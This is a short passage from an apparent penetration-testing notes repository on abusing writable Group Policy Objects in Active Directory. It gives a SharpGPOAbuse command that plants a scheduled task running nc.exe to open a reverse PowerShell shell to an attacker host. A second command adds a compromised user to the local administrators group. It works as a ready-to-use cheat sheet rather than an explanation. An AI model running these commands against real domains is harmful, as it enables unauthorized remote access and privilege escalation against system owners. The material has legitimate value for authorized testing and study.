H3llKa1ser/B00t2R00t/Active Directory Penetration Testing/Privilege Escalation/DACL Attacks/Group Policy Object (GPO).md

     ./SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author Administrator --Command "cmd.exe" --Arguments "/c /tmp/nc.exe attacker_ip 4545 -e powershell" --GPOName "weakGPO"

+OR simply, add our compromised user to the local administrator group

+    .\SharpGPOAbuse.exe --AddLocalAdmin --GPOName "weakGPO" --UserAccount USER

 # Linux

 We can update a GPO with a scheduled task for example to obtain a reverse shell